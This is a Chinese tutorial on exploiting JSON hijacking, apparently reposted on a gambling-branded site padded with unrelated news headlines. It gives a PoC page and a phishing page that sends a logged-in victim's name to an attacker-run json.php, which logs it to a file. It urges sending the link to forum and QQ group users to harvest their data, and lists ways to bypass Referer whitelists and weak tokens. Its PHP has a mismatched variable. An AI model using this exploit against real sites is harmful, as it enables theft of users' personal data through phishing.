太阳集团2138备用网址

  • 2019-06-26
  • [加油!向未来]国产大飞机C919遇严峻考验 机翼被“虐”向上弯曲3米 2019-06-26
  • “新四大发明”火了!中国与世界有了新的沟通桥梁 2019-06-26
  • 《都挺好》曝光终极预告 直击当代家庭“痛点” 2019-06-26
  • 2019-06-26
  • 2019-06-26
  • 7月可乘直升机游览青海湖 2019-06-26
  • 2019-06-26
  • 培华学院召开新闻信息培训暨表彰大会 2019-06-26
  • 吉林师范大学《见地》摄影比赛作品选登 2019-06-26
  • 广州南沙工商企业获得电力暖心服务 2019-06-26
  • 张兴海:汽车新制造是全生命周期的新的制造理念和体系 2019-06-21
  • 2019年03月08日 星期五 2019-06-21
  • 【红人馆】合肥摆了9年的米糕摊又小又难找 摊主竟是两位聋哑合伙人! 2019-06-21
  • 华为 Mate 7(尊爵版电信4G)评论 2019-06-21
  • 欢迎来到 黑吧太阳集团2138备用网址 是业内专业的游戏平台,为你提供各式各样的精品游戏,最全的游戏项目,同时还为您提供各种游戏专题游戏攻略人气论坛。

    小学生都会挖掘的JSON Hijacking实战利用

    来源:本站整理 作者:佚名 时间:2019-01-28 TAG: 我要投稿

    太阳集团2138备用网址 www.r-island.com JSON Hijacking漏洞的详细利用,有点类似与CSRF,不过原理利用方式不同,在这边文章我着重讲解json跨域劫持的利用环境搭建与方式。
    0×01漏洞的挖掘
    一般挖掘的过程中,burpsuite代理的History做寻找,过滤多余不可能存在漏洞的一些链接,如下图所示:

    我们在返回包中json格式发现了如下的敏感信息(用户Id,用户名,用户手机号码)。

    0×02漏洞的证明之poc
    提交漏洞,poc在众测时要争分夺秒,所以这边用了最精简的一个POC。
    假如返回的数据为:
    txf({“data”:{“name”:”唐晓峰”}});
    html>
    head>
    script>
    function txf(a){
    alert(a.data.name);
    }
    script>
    script src=http://***.***.**/wm/User/getUserInfo?callback=txf>script>
    body>
    html>
    即可如下弹窗:

    0×03漏洞的利用之钓鱼
    1.准备一台web服务器,我直接phpstudy搭的。
    附上服务器端的代码
    json.php
    $nickname=$_GET['name'];
    $fp = fopen('info.txt','a');
    $flag = fwrite($fp, "名字:  ".$name."\r\n");
    ?>html>
    钓鱼.html
    head>    title>txftitle>script> var xmlhttp;    function txf(a)    {    xmlhttp=new XMLHttpRequest() var x="http://***.***.***/json.php?name="+a.data.name; xmlhttp.open("GET", x, true); xmlhttp.send(); }script>>script src=http://***.***.***?callback=txf>script>head>body> textarea>钓鱼啦,傻瓜textarea>>body>html>
    把钓鱼链接http://***.***.***/钓鱼.html发给该网站已登陆的用户,如论坛,社区QQ群,社区贴吧等,服务端即可获取到大量用户敏感数据。
    这边以hackone的一个项目为例:

    0×04漏洞的修复与绕过
    因为这个例子是小伙伴发过来的还没修复,所以都脱敏了,我们再从开发修复的角度去思考如何绕过修复。
    1.Referer白名单
    子域名绕过,文件名绕过,空Referer绕过
    2.增加token认证
    token足够复杂或者服务端加密,我们无法绕过,如果token很简单,如纯数字,我们可以尝试遍历绕过
    3.接口禁用
    无敌的操作,无法绕过
    总结:
    非常有意思的一个劫持,以前没有利用过,只是知道有这么个东西,一般众测或者项目上遇到我都是直接截图,申明一波敏感信息泄露,然后就结束了,很低危,这次实战利用之后,稍微提高了一点逼格。
     

    【声明】:太阳集团2138备用网址(http://www.r-island.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@www.r-island.com,我们会在最短的时间内进行处理。